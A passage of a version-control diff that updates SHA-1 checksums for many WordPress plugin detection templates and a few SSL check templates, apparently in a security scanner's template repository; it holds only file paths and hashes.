-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
-http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
+http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
-http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7198,7 +7199,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:2956ed9988fb90ac77bd13023db8f396510f4274
+templates-checksum.txt:30a84f287748d2dd14cc355fb0aafdb928d74d4a
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
